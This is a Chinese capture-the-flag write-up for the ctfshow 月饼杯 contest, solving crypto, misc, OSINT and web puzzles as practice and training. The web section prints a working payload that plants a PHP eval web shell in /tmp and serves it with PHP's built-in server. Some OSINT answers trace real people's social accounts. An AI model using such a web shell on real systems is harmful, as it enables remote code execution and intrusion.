【ctfshow】月饼杯(第二届)-wp

技术有限，只解出部分题目
睡觉前还是前10的，一觉醒来就没了，呜呜呜:(

CRYPTO

我的木头啊！！！

根据提示为栅栏加密
但不是普通的栅栏，而是W型
解出来后就是base全家桶了

一封信

网站直接一把梭，密钥在题目中

MISC

杂项签到

在图片的最后有一串base64加密的字符串，解码即可

有手就行

图片备注中得到关键信息

汉明码不会算
参考文章

HelloFlag

第一次做这种区块链的题目
感觉是非预期了
首先下载MetaMask这个插件
打开网址

将地址替换为题目中的

点这个（我瞎点的）

查看更多信息

转成UTF-8就能看到flag了

project Tao-1

太套了吧
log中并没有任何有用的信息就不放出来了
第零关：/W4lc0me 没啥好说的，直接下一关
第一关：/Letsstart 源码里有
第二关：/some_informations 根据提示找到错误，那就是去掉s
第三关：/some_information 有色块，转成asciiG0od! Next /CTFG0d
第四关：/CTFG0d 有一串加密字符串，先base64–>base16–>base64–>base32,得到ecalptx4N/ 反转一下/N4xtplace
第五关：/N4xtplace 源代码中的颜文字aaencode解密一下
第六关：/cftla5gsh0w title的提示去掉flag
第七关：/ct5sh0w 源码中有一张二维码，修复一下
第八关：/t308g0d 一张图片，下载后改高度（原来crc没报错的情况下高度不一定正确（8神说高度和IHDR块的CRC都被改了））

project Tao-2

第九关：/DEADSOUL
就是第八关的图片名字

第十关：/HIRE
提示知乎彩蛋
在console可以找到

第十一关：/about_baidu
log提示说访问图片
找到图片的RGB值和alpha值（就是ps中灰度滑块的值）
即14.215.117.35，访问是百度首页

根据提示找到地址

第十二关：/ns
在地图上将诗句中的地名连接起来
组成两个字母ns

第十三关：/ONLY2GAME
根据log，发现是莫斯密码
将SAYL7UNIT用莫斯加密
然后-和.互换再次解密

第十四关：/TAOFINAL
5bit编码——>博多密码
在线解码
将.换成0，-换成1

最终：flag在图片最后面

月饼起义

第一次出题目，有点激动，哈哈哈
感谢@rot的出题协助

1：首先下载，得到一个压缩包，但是不能直接解压，是损坏的
可以看到有一个hint.txt

尝试用binwalk分离

查看这个文本

是零宽隐写
解出来一个hint：170，
哎但是暂时没啥用

2：再回去查看压缩包
会发现中间隐藏了一个文件


提取出来后异或之前得到的数值170
脚本如下：

f=open("data","rb")
d=f.read(9999999)
e=""
for i in d:
    e=e+chr(ord(i)^170)
f=open("data_xor","wb")
f.write(e)
f.close()

观察到有89 50 4e 即png图片头

逆序脚本：

f=open("data_xor","rb")
d=f.read(9999999)
d=d[::-1]
f=open("flag.png","wb")
f.write(d)
f.close()

然后使用stegsolve 查看通道信息

得到最终的flag图片

OSINT

幸福小镇

百度百科可以看到所有信息，角色，配音等都在里面

PS打卡第一天

先改后缀为psd
把4张图片导出
百度识图搜冬天这张

看到了域名为兰州大学
直接交试试看，没想到真是兰州大学

抬头看看

直接老朋友谷歌识图
找到几篇新闻，都是近期发生的

在新闻中得到关键信息The lvy餐厅

谷歌地图

实景看看
嗯，一模一样，剩下的就不说了

以卵击石

通过百度识图得到的图片猜测大概是个柠檬的外表
直接在b站搜
一个一个看

拿到制作的视频（甜点的售价_内层馅料的种数都在视频中）
通过评论区的关键词（请吃饭，蹭饭），翻看“雨哥到处跑”和“力元君”的往期视频，可以发现有一期（蹭饭挑战）提到了这个柠檬

拿到视频号

组合一下就好啦

我的朋友

暴打出题人，啊啊啊啊
这一题我前前后后做了4个小时左右，一直组合不对，最后发现顺序错了
根据提示，猜测人物为LOL的解说

lol解说大部分活跃在微博
直接微博搜索英雄联盟主持人
得到几个人物（余霜，小钰，骆歆）

在她们的微博中翻与图片一致的衣服
最后在骆歆的微博中找到了时间，战队等信息

搜一下赛程表

在搜战绩

接着是第二场比赛

战绩

组合在一起

套套去哪儿

根据提供的信息（2021年6月3号下午和图片中的机型B-6467）
在飞常准app中可以查到如下信息
西藏航空 TV9817 13:00-15:30 拉萨贡嘎T2-泸州云龙
西藏航空 TV9817 13:00-17:55 拉萨贡嘎T2-太原武宿T1
西藏航空 TV9817 16:00-17:55 泸州云龙-太原武宿T1

深圳航空 ZH3721 13:00-15:20 拉萨贡嘎T2-泸州云龙
深圳航空 ZH3721 13:00-17:55 拉萨贡嘎T2-太原武宿T1
深圳航空 ZH3721 16:00-17:55 泸州云龙-太原武宿T1

长龙航空 GJ5039 13:00-15:20 拉萨贡嘎T2-泸州云龙
长龙航空 GJ5039 13:00-17:55 拉萨贡嘎T2-太原武宿T1
长龙航空 GJ5039 16:00-17:55 泸州云龙-太原武宿T1

接下来就不会了，然后一个一个航班查，一个一个城市试，结果还真蒙对了

见字如面

赛后做出来的
hint1:想想是哪些人收到信呢，信字加粗一下
hint2:以写信收藏体育娱乐以及其他明星为主
真没有想到在贴吧，学废了

百度识图得到人物名字：山姆
在吧内搜索

在他的其他帖子里找到了qq

web

web签到

MD5等于自身，如md5($a)==$a,php弱比较会把0e开头识别为科学计数法，结果均为0，所以此时需要找到一个MD5加密前后都是0e开头的，如0e215962017

不要离开我

在可写的/tmp目录下传木马并写系统命令，然后提交5秒内进⾏check，check会关闭nginx和php-fpm，由于是www-data权限，⽆法启动nginx和php-fpm，直接启动php内置服务器即可

cmd=file_put_contents("/tmp/index.php","<?php eval(\$_POST['a']);?>");system("sleep 5 && php -S 0.0.0.0:80 -t /tmp/");

注意特殊字符编码
传入后可以在蚁剑看看有没有成功写入php

flag在根目录
（出现Notice: Undefined index: a in /tmp/index.php on line 1是正常情况）